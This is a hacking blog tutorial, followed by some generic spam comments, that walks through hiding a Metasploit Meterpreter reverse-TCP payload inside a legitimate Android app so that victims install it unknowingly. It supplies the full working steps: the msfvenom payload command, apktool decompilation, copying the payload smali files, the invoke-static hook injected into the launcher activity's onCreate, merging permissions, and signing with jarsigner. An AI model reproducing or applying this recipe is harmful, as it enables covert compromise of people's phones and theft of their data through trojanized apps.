How to Embed a Metasploit Payload into Main .apk File

24
3858
Metasploit
5/5 (2)

Embed a Metasploit Payload into an Main Android apk File

Welcome Back Guys, Today you will learn how to make your malicious Android .apk more convincing by injecting a hook of our Metasploit payload into an authentic apk file.

Metasploit‘s flagship product, the Meterpreter, is very powerful and an all-purpose payload. Once installed on the victim machine, we can do anything we want to their machine through sending out commands to it. for example, we could grab sensitive data out of the compromised device.

metasploit (masterofhacking)

The Meterpreter payload also comes as an install able .apk file for Android systems. Excellent! Now we are able to use Metasploit to compromise Android phones also. But if you have tried out those payloads you would know that they do not look convincing. No one of their right thoughts goes to install and run such an app, which apparently does not anything while it’s far opened. So how are we going to make the victim run the payload app of their smartphone?

One of the solutions is that you may embed the payload inside any other valid app. The app will appearance and behave exactly as the authentic one, so the sufferer won’t even understand that his system is compromised. That is what we’re going to do in this tutorial.

Injecting Metasploit Payloads into Android App

Lets start,

Download an original Android apk file you can get one from.

https://apkpure.com/

Install Libraries if you are running a 64 bit operating system install lib32.

apt-get install lib32stdc++6 lib32ncurses5 lib32z1

Now we need to generate our malicious payload.

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 R > meterpreter.apk

metasploit

If you don’t know what your LHOST is you can check using ifconfig.

ifconfig

ifconfig

Now we have our malicious payload we need to Download and install Apktool if you are running Kali Linux Apktool is already included in the OS (If your running Kali Linux you can skip this step.)

https://ibotpeaches.github.io/Apktool/install/

Now its time to recompile our apk files. Open up a new terminal and use the commands below to recompile our apk files to a new location.

(The d option will tell apktool to decompile our apk file, -f is to replace previous decompiled apk’s code, -o is the output location we want our decompiled files to go to.)

apktool d -f -o original /root/[Original_APK_Name]
apktool d -f -o original /root/meterpreter.apk

metasploit

This will decompile the payload to “/root/payload” and the original apk to “/root/original” directory.

metasploit

Now we need to copy the payload files to the orginal Apk’s folder go to the directory “/root/payload/smali/com/metasploit/stage” and copy all the payload.smali files. Now paste them in “/root/original/smali/com/metasploit/stage” you will need to create the folders for /com/metasploit.

metasploit

Now we need to find out what activity to run when the app is launched the information is stored in the AndroidManifest.xml file open AndroidManifest.xml from “/root/original” with your favorite text editor. You will see Markup Languages, and both use the familiar tags and attributes. look for an <activity> tag which contains both of these lines you can use CTRL+F to search for the line of code.

<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>

When you locate that activity, “android:name” attribute’s value. Example of attribute.

“com.piriform.ccleaner.ui.activity.MainActivity”.

metasploit

Now we know the name of the activity we can edit it replace the [Activity_Path] with the activity’s “android:name”, but instead of the dots, use slash.

metasploit

gedit /root/original/smali/[Activity_Path]

Now find the line below.

;→onCreate(Landroid/os/Bundle;)V

When you locate it, paste the following code in the line next to it this will start the payload along side of the orginal apk code.

invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

metasploit

Now we need to inject the necessary permissions to our apk. A “permission” is a mechanism that enforces restrictions on specific operations that only a particular process can perform.

To edit permissions we will go to /root/payload/AndroidManifest.xml and copy the Payload’s permissions to AndroidManifest, my /root/original/AndroidManifest.xml and save the file make sure you done have any duplicate permissions.

metasploit

Now we have our permissions set we can now recompile our apk open a new terminal and use the following commands to recompile.

apktool b /root/original

Switch /root/original with your apk’s path.

Now our apk is compiled we need to sign it this is very important as a unsigned apk won’t be installed. When we sign our malicious apk file replace the [apk_path] with the path to your apk file.

jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA [apk_path] androiddebugkey

If you are using a Android you can also use Zip Signer its a great tool from signing files including zip, and apk.

You can download it from PlayStore by searching for Zip Signer.

Now the apk is complete.

I hope you enjoyed this tutorial.

 

Please rate this

24 COMMENTS

  1. You really make it seem so easy with your presentation but I find
    this topic to be actually something that I think I would never understand.

    It seems too complicated and extremely broad for me. I am looking forward for your next post, I’ll try to get the hang of it!

  2. Does your site have a contact page? I’m having trouble
    locating it but, I’d like to shoot you an e-mail.
    I’ve got some creative ideas for your blog you might be
    interested in hearing. Either way, great website and I look forward
    to seeing it grow over time.

  3. I’m truly enjoying the design and layout of your website.
    It’s a very easy on the eyes which makes it much more enjoyable for me to
    come here and visit more often. Did you hire out a designer to
    create your theme? Great work!

  4. Just wish to say your article is as amazing.
    The clarity in your post is simply cool and i could assume you’re an expert on this subject.
    Fine with your permission allow me to grab your feed to keep updated with forthcoming post.
    Thanks a million and please carry on the gratifying work.

  5. Greetings! I know this is kind of off topic but I was wondering which blog platform are you using for this site?

    I’m getting sick and tired of WordPress because I’ve had
    problems with hackers and I’m looking at alternatives for
    another platform. I would be fantastic if you could point me in the direction of a good platform.

  6. I am curious to find out what blog system you happen to be using?
    I’m having some small security issues with my latest site and I would like to find something more safe.
    Do you have any solutions?

  7. Appreciating the time and energy you put into your website and detailed
    information you provide. It’s awesome to come across a blog every once in a
    while that isn’t the same old rehashed material. Wonderful read!

    I’ve saved your site and I’m adding your RSS feeds
    to my Google account.

LEAVE A REPLY

Please enter your comment!
Please enter your name here